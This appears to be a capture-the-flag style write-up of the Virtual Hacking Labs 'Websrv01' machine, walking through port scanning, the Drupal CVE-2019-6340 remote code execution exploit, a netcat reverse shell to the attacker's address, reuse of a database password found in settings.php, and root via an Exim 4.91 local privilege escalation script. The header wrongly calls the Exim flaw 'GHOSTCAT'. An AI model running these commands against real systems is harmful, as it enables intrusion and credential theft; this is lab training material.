xsspresso
xsspresso
WriteupsVHL — Websrv01
MiscMediumLinux

VHL — Websrv01

Food Magazine site on Ubuntu with Exim 4.91 SMTP. Exploited CVE-2019-10149 Exim privilege escalation (GHOSTCAT) for root.

February 16, 2025Virtual Hacking Labs
#Exim#CVE-2019-10149#SMTP#Privilege Escalation

nmap

sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.2.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 17:23 EST
Nmap scan report for 10.11.2.243
Host is up (0.024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b0:ab:c5:a1:dd:34:e4:97:ed:fa:3b:07:bb:87:f3:ec (RSA)
|   256 01:de:7b:fd:28:85:64:3f:7c:60:b9:6d:4b:c9:97:ea (ECDSA)
|_  256 15:fa:43:0c:15:11:33:4c:7a:07:b4:a8:0c:7e:5a:cc (ED25519)
25/tcp open  smtp    Exim smtpd 4.91
|_ssl-date: TLS randomness does not represent time
| smtp-commands: websrv01 Hello nmap.scanme.org [172.16.1.1], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, STARTTLS, PRDR, HELP
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
| ssl-cert: Subject: commonName=websrv01/organizationName=Exim Developers/countryName=UK
| Not valid before: 2025-02-16T22:24:13
|_Not valid after:  2025-02-16T23:24:13
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Food Magazine
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: Host: websrv01; OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT      ADDRESS
1   24.03 ms 10.11.2.243
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.84 seconds

80

sh
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Home | Food Magazine
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.29 (Ubuntu)

droopescan

sh
droopescan scan joomla --url http://10.11.2.243/
[+] No version found.                                                           
 
[+] Possible interesting urls found:
    License file. - http://10.11.2.243/LICENSE.txt
 
[+] Scan finished (0:00:01.071659 elapsed)
sh
feroxbuster --url http://10.11.2.243
                                                                                                                                                  
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.11.2.243
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       55l      182w     1990c http://10.11.2.243/core/drupalci.yml
200      GET       74l      298w     3619c http://10.11.2.243/core/phpunit.xml.dist
302      GET       12l       22w      360c http://10.11.2.243/user/ => http://10.11.2.243/user/login
403      GET      323l      976w    17818c http://10.11.2.243/user/register
200      GET       19l       53w      390c http://10.11.2.243/core/profiles/minimal/minimal.info.yml
403      GET      323l      976w    17819c http://10.11.2.243/admin
404      GET      323l      978w    17829c http://10.11.2.243/index.php/comment/
404      GET      323l      978w    17819c http://10.11.2.243/comment/
404      GET      323l      978w    17829c http://10.11.2.243/index.php/comment/reply
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/testing_install_profile_all_dependencies/core/profiles
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/minimal/core/profiles
404      GET      323l      978w    17816c http://10.11.2.243/core/profiles/minimal/core/
200      GET      477l     1573w    27538c http://10.11.2.243/index.php/filter/tips
200      GET      477l     1573w    27517c http://10.11.2.243/filter/tips
404      GET      323l      978w    17826c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      139l      760w     5889c http://10.11.2.243/README.txt
200      GET       28l      120w      997c http://10.11.2.243/profiles/README.txt
302      GET       12l       22w      364c http://10.11.2.243/search => http://10.11.2.243/search/node
302      GET       12l       22w      404c http://10.11.2.243/index.php/search => http://10.11.2.243/index.php/search/node
404      GET      323l      978w    17816c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      103l      392w     4555c http://10.11.2.243/web.config
302      GET        0l        0w        0c http://10.11.2.243/core/rebuild.php => http://10.11.2.243/
200      GET      463l     2735w    20159c http://10.11.2.243/core/INSTALL.txt
200      GET       42l      240w     1542c http://10.11.2.243/core/INSTALL.sqlite.txt
302      GET       12l       22w      400c http://10.11.2.243/index.php/user/ => http://10.11.2.243/index.php/user/login
200      GET     4713l     6943w   167219c http://10.11.2.243/core/yarn.lock
200      GET      339l     2968w    18002c http://10.11.2.243/core/LICENSE.txt
301      GET        9l       28w      312c http://10.11.2.243/modules => http://10.11.2.243/modules/
301      GET        9l       28w      311c http://10.11.2.243/themes => http://10.11.2.243/themes/
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET       11l       32w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      568l     1611w    29861c http://10.11.2.243/index.php/node/
302      GET       12l       22w      360c http://10.11.2.243/user => http://10.11.2.243/user/login
200      GET      568l     1611w    29861c http://10.11.2.243/node/

Drupal < 8.6.9 - REST Module Remote Code Execution

  • https://www.exploit-db.com/exploits/46459
sh
python3 46459.py http://10.11.2.243/ whoami
CVE-2019-6340 Drupal 8 REST Services Unauthenticated RCE PoC
 by @leonjza
 
References:
 https://www.drupal.org/sa-core-2019-003
 https://www.ambionics.io/blog/drupal8-rce
 
[warning] Caching heavily affects reliability of this exploit.
Nodes are used as they are discovered, but once they are done,
you will have to wait for cache expiry.
 
Targeting http://10.11.2.243/...
[+] Finding a usable node id...
[x] Node enum found a cached article at: 1, skipping
[+] Using node_id 2
[+] Target appears to be vulnerable!
 
www-data
sh
python3 46459.py http://10.11.2.243/ 'busybox nc 172.16.1.1 1234 -e bash'
sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
sh
╔══════════╣ Searching passwords in config PHP files
  'password' => 'Drup@lM@nager',
 *     'password' => 'sqlpassword',
 *   'password' => 'sqlpassword',

/var/www/html/sites/default/settings.php

sh
$databases['default']['default'] = array (
  'database' => 'drupal8',
  'username' => 'drupalmanager',
  'password' => 'Drup@lM@nager',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'namespace' => 'Drupal\\Core\\Database\\Driver\\mysql',
  'driver' => 'mysql',
);
sh
www-data@websrv01:/home$ su drupalmanager              
su drupalmanager
Password: Drup@lM@nager
 
drupalmanager@websrv01:/home$ whoami
whoami
drupalmanager
sh
ssh drupalmanager@10.11.2.243

exim privilege escalation

  • Exim smtpd 4.91
  • https://packetstorm.news/files/id/153312
sh
drupalmanager@websrv01:~$ ./exim.sh 
 
raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
 
Preparing setuid shell helper...
 
Delivering setuid payload...
220 websrv01 ESMTP Exim 4.91 Sun, 16 Feb 2025 23:44:47 +0000
250 websrv01 Hello websrv01 [127.0.0.1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1tjoJb-0009V8-Gn
221 websrv01 closing connection
 
Waiting 5 seconds...
-rwsr-xr-x 1 root drupalmanager 8392 Feb 16 23:44 /tmp/pwned
# whoami
root
# cat /root/key.txt
bgmwgo01xiiinumbb1cd
# date
Sun Feb 16 23:48:25 UTC 2025
#

Up next

MediumFeb 2025

VHL — PMV02

b2evolution blog CMS on Ubuntu. Authenticated file manager abuse and PHP filter injection lead to remote code execution.

Read writeup
MediumFeb 2025

VHL — Tracker

MantisBT bug tracker on Debian with POP3. Credential enumeration via mail service and MantisBT RCE for shell access.

Read writeup
HardFeb 2025

HTB — Checker

TeamCity authentication bypass combined with Bookstack SSRF to read internal files and chain into remote code execution.

Read writeup